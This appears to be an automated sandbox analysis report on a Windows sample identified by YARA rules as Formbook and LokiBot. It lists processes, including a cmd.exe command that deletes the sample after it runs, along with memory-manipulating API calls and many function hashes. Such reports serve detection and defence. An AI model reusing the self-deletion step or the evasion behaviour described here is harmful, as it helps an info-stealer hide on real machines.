autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5608 Parent PID: 5516

General

Start time:	20:17:44
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\RYATPPETU.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5612 Parent PID: 5608

General

Start time:	20:17:45
Start date:	27/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RYATPPETU.exe PID: 1860 Parent PID: 5936 RYATPPETU.exeCOMMON

Executed Functions

Function 022C005C, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 766COMMON

Download Yara Rule

Strings

86x*, xrefs: 022C0F51
$!s, xrefs: 022C03E7
$!s, xrefs: 022C03EC

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: $!s$$!s$86x*
API String ID: 3389902171-3481788298
Opcode ID: ed0448ba3ebb6276f13250ec5ebac96a80fb668ba3ac88f90cd0105fe9ae66f1
Instruction ID: 5b0cc5b8b798d3870f9505054cf1d400b8f19ce46c18e821922b65d738e346fa
Opcode Fuzzy Hash: ed0448ba3ebb6276f13250ec5ebac96a80fb668ba3ac88f90cd0105fe9ae66f1
Instruction Fuzzy Hash: 0A525D30518386CBDF259F7889987DA7BE29F06360F59835ECC9A8F29AD3748641C712

Uniqueness

Uniqueness Score: -1.00%

Function 022BB270, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 1101memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 022BE1D2: LoadLibraryA.KERNELBASE(?,1E28B13B,?,022C006B,022B9261,000000BC,-49C04550), ref: 022BE2C5

NtAllocateVirtualMemory.NTDLL(-B8AB437E), ref: 022BB54F

Strings

"*}, xrefs: 022BB2B5

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: "*}
API String ID: 2616484454-2645663905
Opcode ID: 2c6a7ce685b3d856429ce3f16376e18ddee0ee92c797c403ec19b4376b555f62
Instruction ID: 507bf6db58398ab65f1ef24a6f2c0bd79d30344326392535319ae457168203e5
Opcode Fuzzy Hash: 2c6a7ce685b3d856429ce3f16376e18ddee0ee92c797c403ec19b4376b555f62
Instruction Fuzzy Hash: 9792537262434ACFDB349E68CDA47EA37B2FF55390F45422EDD8A9B254D3708981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022BF407, Relevance: 1.9, APIs: 1, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 58fefe54c63687cbbc31a915b84a99643f1d99b9548a557a0db11e6ff2d6a982
Instruction ID: a18f964b18fcfa895eff0f1b7e62490a0a7de50ce0e5ba2e4d683aca96bf8d17
Opcode Fuzzy Hash: 58fefe54c63687cbbc31a915b84a99643f1d99b9548a557a0db11e6ff2d6a982
Instruction Fuzzy Hash: C6D18A31524356DFDF359EA88E603EB33A2EF45390F55402EDC8ADBA09D7708A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022C16C5, Relevance: 1.8, APIs: 1, Instructions: 255COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 022C1E3B

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: 8d2d456dc49616dd3f5ea7c9cf2e270bee7b33edd560cfa0742cda33c1807761
Instruction ID: b1ccd58d2a6c26b6b9730531e1220973d965d35817ecded8e21ae4b4ff4b253d
Opcode Fuzzy Hash: 8d2d456dc49616dd3f5ea7c9cf2e270bee7b33edd560cfa0742cda33c1807761
Instruction Fuzzy Hash: 5D918B71528349CFCB399EB8C9A63EA37A2AF46350F61421FCC8ECB24AD3754955CB41

Uniqueness

Uniqueness Score: -1.00%

Function 022C1A07, Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981d98741f3ce34472b79b98e9814a7010bc3f0cefe706a03149f6b54bfc6077
Instruction ID: c0e5d15c24ccefa46e540b95b979062456973bc788883e9cc6f14f98be12c483
Opcode Fuzzy Hash: 981d98741f3ce34472b79b98e9814a7010bc3f0cefe706a03149f6b54bfc6077
Instruction Fuzzy Hash: D4616971514348CFCB399F78C9A53EA3BA2BF46310F66421ECC9ACB29AC7718951CB41

Uniqueness

Uniqueness Score: -1.00%

Function 022B373D, Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f7b673ba8088d0108dfbf7fa3ca21395aedd9d7a38ef414acdd7f1a9e7f732
Instruction ID: 4de5180a95d6df1f322646fda744d457131a5473a088c47612d5d042d23f77e8
Opcode Fuzzy Hash: a5f7b673ba8088d0108dfbf7fa3ca21395aedd9d7a38ef414acdd7f1a9e7f732
Instruction Fuzzy Hash: 9741E1718247469FCF36DEB844243EE3B53EF853A0F89425ECCA65B694C7718542C782

Uniqueness

Uniqueness Score: -1.00%

Function 022BE9B4, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38fdad7f40ee35b6e450b7b377eb95ce46fe68eb944625166053636e846464b9
Instruction ID: 049aa7f43fd04d8259c7b38e2264ebf687e4017829d9f334681f621f4024ef1d
Opcode Fuzzy Hash: 38fdad7f40ee35b6e450b7b377eb95ce46fe68eb944625166053636e846464b9
Instruction Fuzzy Hash: C931E971A213559FCB35DE98C8547DE73E6BF58790F96412ADC09DB218D3709E40CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022C10AF, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(07F1857C,?,?,?,?,022C0165), ref: 022C118F

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 0b584f48110e8363bae68495257584295438791c53d44a568469939e304ec99c
Instruction ID: 7811dd55a7759baf1683907548054fbd7589e9895a93944cbac2dc90d5024dea
Opcode Fuzzy Hash: 0b584f48110e8363bae68495257584295438791c53d44a568469939e304ec99c
Instruction Fuzzy Hash: E00116B26181989FDB24CE6DDC497DB36A7ABC9600F54812AAC0D8B305D6709D008B55

Uniqueness

Uniqueness Score: -1.00%

Function 022BC135, Relevance: 1.5, APIs: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 022BC788

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82ef74057d9b5eb846f23043d9138d2ade4e1f7d4c2f6d855c575eb7b58403bd
Instruction ID: 1a9082eae3f07fef649cd8e1dd3fe7f8b211d932eaa4a16b60a911e2a149ae98
Opcode Fuzzy Hash: 82ef74057d9b5eb846f23043d9138d2ade4e1f7d4c2f6d855c575eb7b58403bd
Instruction Fuzzy Hash: CFF05CF7029506968200EAE4CC801FE3723EFC06747549B15C1302B9E8C671B376ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 00401130, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 429COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401135

Strings

VB5!6&*, xrefs: 00401130

Memory Dump Source

Source File: 00000000.00000002.404651912.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.404648075.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.404668625.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.404674146.0000000000420000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: e06b08fc4fd01144f6f4668f18524f9b346410ce72dd8dc54057a6f24e806746
Instruction ID: 50f2251069fafbbb2053b70a72dda8bc55e0a27b012209cac58365b85892da45
Opcode Fuzzy Hash: e06b08fc4fd01144f6f4668f18524f9b346410ce72dd8dc54057a6f24e806746
Instruction Fuzzy Hash: 1971AD6844E3C44FE3178B718A65289BF70AE13650B1E46DBC5C6DF9A3C22C9C0AC767

Uniqueness

Uniqueness Score: -1.00%

Function 022C1EC6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1E28B13B,?,022C006B,022B9261,000000BC,-49C04550), ref: 022BE2C5

Strings

-a, xrefs: 022C1FBB

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: -a
API String ID: 1029625771-1531320798
Opcode ID: 8b3732cd3882a6fdb1df882b77bf3ad5444c24bdf48c30ede5456489f1c2d15d
Instruction ID: c3155a80bb6da66cf4696c25a69ab877b1db7a0507dea4de52885548a37278dc
Opcode Fuzzy Hash: 8b3732cd3882a6fdb1df882b77bf3ad5444c24bdf48c30ede5456489f1c2d15d
Instruction Fuzzy Hash: 3431A936A6139E9BDF322F788C243EA3761EF5A350FC9022ACC5D9B245D3B04684CB01

Uniqueness

Uniqueness Score: -1.00%

Function 022B342B, Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffcb067abd18a3daf8f1c9ea4510395af2f04b0dcf382fba4415e8448a926c03
Instruction ID: 8befcf5a365fe48bba9c83cb3d8759a6efc58072fd1284e26eeba61b3505211c
Opcode Fuzzy Hash: ffcb067abd18a3daf8f1c9ea4510395af2f04b0dcf382fba4415e8448a926c03
Instruction Fuzzy Hash: AA4178724642469BCF325EB888043EF33A3DF443B0F550616EC3AEB294C3B09A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022B104C, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a01f693fa5288fc140cd05010e88418bb595f836bf097bfc575d231481a9596c
Instruction ID: 245757a7928ad3348dca36f195d80ecec3484863f6994e5b1b98030987ae5a5f
Opcode Fuzzy Hash: a01f693fa5288fc140cd05010e88418bb595f836bf097bfc575d231481a9596c
Instruction Fuzzy Hash: E831ABB613588ADBCB1ACFB4C8641F57772FF863B0B184B49D4395B5A8D33069228B94

Uniqueness

Uniqueness Score: -1.00%

Function 022BAE29, Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,72091243,7F76CF67), ref: 022BB002

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d8cc22c12d8a650d60819ac077f17847a009bbd7ec428d4329e283fcedb72595
Instruction ID: a5461896deef73b693248707a3834719628c484694854912192cbe0724843eb8
Opcode Fuzzy Hash: d8cc22c12d8a650d60819ac077f17847a009bbd7ec428d4329e283fcedb72595
Instruction Fuzzy Hash: E92137BBA29348DFDB208E6589157EFB3E2AF81380F52811DDCC597108D3318A85CB03

Uniqueness

Uniqueness Score: -1.00%

Function 022BE1D2, Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1E28B13B,?,022C006B,022B9261,000000BC,-49C04550), ref: 022BE2C5

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 713e067351cdd75efbf3083b013288cdd0bbd12248e6c5722d46981d1ae8e125
Instruction ID: 4fe8568c8b2573ef2ff8148b7342607ef988b25e148c27b2fe50efbb88281845
Opcode Fuzzy Hash: 713e067351cdd75efbf3083b013288cdd0bbd12248e6c5722d46981d1ae8e125
Instruction Fuzzy Hash: E901D836D216759BCF315EA84C183DA7266AF48B90F8A01269C29AB244D7B09E418F81

Uniqueness

Uniqueness Score: -1.00%

Function 022B10F7, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 022B1130

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: e74b2e8657cca894171e5639c2e128c57149b123db9dcf305b7d60e5d34932d5
Instruction ID: f75bd7bc633abb78735bc7c2aa656674b3922bd239204373e9d9ea18a8f1a3f4
Opcode Fuzzy Hash: e74b2e8657cca894171e5639c2e128c57149b123db9dcf305b7d60e5d34932d5
Instruction Fuzzy Hash: 83F020F70B490BC7C6006A58C8442FCB303EA81AF03051F81D1396BDF4C730A2B51BA8

Uniqueness

Uniqueness Score: -1.00%

Function 022BAC52, Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BE1D2: LoadLibraryA.KERNELBASE(?,1E28B13B,?,022C006B,022B9261,000000BC,-49C04550), ref: 022BE2C5

CreateFileA.KERNELBASE(?,72091243,7F76CF67), ref: 022BB002

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: d8802d4c9fdabaaf663599cc1ed8761d9a1dbd5df40d96132bc690705ccb0798
Instruction ID: 8c3ece1bf5aaaf991eec9d020ffa83e9abf42f7faadfa7ca6205e84954e30e8d
Opcode Fuzzy Hash: d8802d4c9fdabaaf663599cc1ed8761d9a1dbd5df40d96132bc690705ccb0798
Instruction Fuzzy Hash: CCF0B4B192414BCFDB219FB5C485AEE7B73BFA43A0F114508D85947149C73290A2CF60

Uniqueness

Uniqueness Score: -1.00%

Function 022B10D5, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 022B1130

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 7bc295d0113181d5e78480e30ceb51bc3ef2326037da86817ad645b40900eeb4
Instruction ID: 5a7a2b59d1bee559b6ae9351b4bd5db575464a80efee0b92f9288180c3fcc969
Opcode Fuzzy Hash: 7bc295d0113181d5e78480e30ceb51bc3ef2326037da86817ad645b40900eeb4
Instruction Fuzzy Hash: 81E068B557028B8BC7159FC4CC987D5B7AAEFCA2E1F40C66AD06DCA939E3700D0A4A00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 022BB81C, Relevance: 2.8, Strings: 2, Instructions: 321COMMON

Download Yara Rule

Strings

8l#8, xrefs: 022BB88F
?Vx;, xrefs: 022BBE4C

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: 8l#8$?Vx;
API String ID: 1029625771-1074613434
Opcode ID: 2a913612cf84d7ea2a13086d553e3d40218e0b2fb66abe890ab66635d751d457
Instruction ID: 433d1580b739f2edac48681b5aa0045d9edc08ad1109e775bd5c5685a286d524
Opcode Fuzzy Hash: 2a913612cf84d7ea2a13086d553e3d40218e0b2fb66abe890ab66635d751d457
Instruction Fuzzy Hash: 6DC1E27022438ADFDF359E64CD907EE37A2AF453C4F55852ADC8A9B258D7308A81CB12

Uniqueness

Uniqueness Score: -1.00%

Function 022B9095, Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eb911519063f34b68422716e73fd732c762f8e983d8cf0051e19794319fd0aeb
Instruction ID: 4f4005d085e6fcbf953b5acdd6d2097279e810101653c71112fa1777bd30d52f
Opcode Fuzzy Hash: eb911519063f34b68422716e73fd732c762f8e983d8cf0051e19794319fd0aeb
Instruction Fuzzy Hash: F3B1447161434ADFDB24AE68CCA57EA7BB3BF55380F41811EDE8A9B214E3314985CF42

Uniqueness

Uniqueness Score: -1.00%

Function 022B8648, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75ee5ba1105e1aa0da48af76f00ceb4d38fd65afd1b604e6165893b69e6dbe46
Instruction ID: 3c879d95462e56b09419fbd5c6fd624b12beba79622f04150dbd6e816734504f
Opcode Fuzzy Hash: 75ee5ba1105e1aa0da48af76f00ceb4d38fd65afd1b604e6165893b69e6dbe46
Instruction Fuzzy Hash: 90516971A24302DFDB209F74C899BDA77A5BF15390F65425ECC4A9B259C770C980CF92

Uniqueness

Uniqueness Score: -1.00%

Function 022C0689, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fee00d831b429f540ae9ccd0dad659d8f339d2ddad4e8122a014116dd566311
Instruction ID: 9146bbd46ef7f9e53fc59048f5ae98e2027e64cca878dc0954217828cb8539df
Opcode Fuzzy Hash: 0fee00d831b429f540ae9ccd0dad659d8f339d2ddad4e8122a014116dd566311
Instruction Fuzzy Hash: CA516C71518385CBCF248E788C653EA7B92AF12260F59835ECCDA4F2D9D3714246CB12

Uniqueness

Uniqueness Score: -1.00%

Function 022B8BC8, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3f0249c0545ce19291d720993961cbc007ee43cf8e34486111f6b6064a62e1
Instruction ID: ffc7bde8063fd6a4d02479883f71ed74b50d072e819ca2018ab73de830ba89a3
Opcode Fuzzy Hash: 7f3f0249c0545ce19291d720993961cbc007ee43cf8e34486111f6b6064a62e1
Instruction Fuzzy Hash: 9A51F671621745CFCB75CEA5D9E53EB32E2AF04780F50492FCE5F8A609D331AA818B16

Uniqueness

Uniqueness Score: -1.00%

Function 022BE7B8, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886d1390f5c81c49119e2b0f187b3e7e835c41c47f41e997798a9aeb914c5dc5
Instruction ID: 3b9fb18f1bce299a86e8cce6fc7ff0a69bb47031ea29354e283a0aff0a210a26
Opcode Fuzzy Hash: 886d1390f5c81c49119e2b0f187b3e7e835c41c47f41e997798a9aeb914c5dc5
Instruction Fuzzy Hash: 6F31483562939B8FCB329FA8C8947E63791EF1A780FC6811DCDDA8B646D3704445CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022BE1A6, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de64ea0b79eabadcc173e888a95312882270a35838171e8b9180c495dc408e00
Instruction ID: 10bdb5809e095aca5f5e5acf6584c7075e6bf675021f654f37f6ca12a3c90dab
Opcode Fuzzy Hash: de64ea0b79eabadcc173e888a95312882270a35838171e8b9180c495dc408e00
Instruction Fuzzy Hash: 36C092B43126418FEB89DE1AC290FC273F0FB64AC0F4145A8E801CBB19D329E8008A04

Uniqueness

Uniqueness Score: -1.00%

Function 022BAC2C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RYATPPETU.exe PID: 2248 Parent PID: 1860 RYATPPETU.exeCOMMON

Executed Functions

Function 1E6B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B966A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86f25770de5923eb35e4583a105fbb3b897b4bf5129cda4e8f4e059e4d5814d8
Instruction ID: 6571b04e23984d3a78096421cca3e9f546507996ea9b73b2c4f6f7f36cfc1345
Opcode Fuzzy Hash: 86f25770de5923eb35e4583a105fbb3b897b4bf5129cda4e8f4e059e4d5814d8
Instruction Fuzzy Hash: 2590027120100802D280755A440564E010997E1741FD5C115E0015754DCA558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B9A5A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f5a6b1be8c2af58677410e8fd84acfdf262ee557c362af3db88e151bef766f4
Instruction ID: 6e9a99b24bc5bde537ce05a5551a441d6da6e8000905b0459a3d1658ad4cdae7
Opcode Fuzzy Hash: 7f5a6b1be8c2af58677410e8fd84acfdf262ee557c362af3db88e151bef766f4
Instruction Fuzzy Hash: BF90026121180042D300696A4C15B0B010997E0743FD5C215E0144654CC955886165A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B9A2A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c9a76a6730ea3e904166f36fef54aa96a3f34b7fff1e75ad05781a652341bab
Instruction ID: 2ac900fd20c5682c4f3e0b6cfa4518f50ad6d1e20a26e5f7ac4bda2bc3084fb6
Opcode Fuzzy Hash: 2c9a76a6730ea3e904166f36fef54aa96a3f34b7fff1e75ad05781a652341bab
Instruction Fuzzy Hash: B7900261601000424240756A884590A4109BBF16517D5C221E0988650D8599886566E5

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B9A0A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 08a0a6433215e124af00f53dadfc4a5b80a58cde9c7704059e22ce6c1516fd5f
Instruction ID: 23b29ee5865e132108d72dab354cf798fdba1996ec849b7a1fd7716c6692fd79
Opcode Fuzzy Hash: 08a0a6433215e124af00f53dadfc4a5b80a58cde9c7704059e22ce6c1516fd5f
Instruction Fuzzy Hash: A090027120140402D200655A481570F010997E0742FD5C111E1154655D8665885175F1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B96EA

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 930ca76497ff5be78aac05c68d8409689af0a53bd74fe070e2b84cc83b5d81e5
Instruction ID: b0db439fffafad6ea083247cc50c498ee649d095dedd62ba551a1aef15a00081
Opcode Fuzzy Hash: 930ca76497ff5be78aac05c68d8409689af0a53bd74fe070e2b84cc83b5d81e5
Instruction Fuzzy Hash: 1D90027120108802D210655A840574E010997E0741FD9C511E4414758D86D5889171A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E6B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E6B971A

Memory Dump Source

Source File: 00000008.00000002.616879381.000000001E650000.00000040.00000001.sdmp, Offset: 1E650000, based on PE: true

Associated: 00000008.00000002.617049098.000000001E76B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2448ce55299a36781cfef282d46b842fee36c358c32900020834a09784c538ef
Instruction ID: 1112c5deecd7594766d9777eedbc7c89c25e737ad4c3b9cf6855e0cd85d804ff
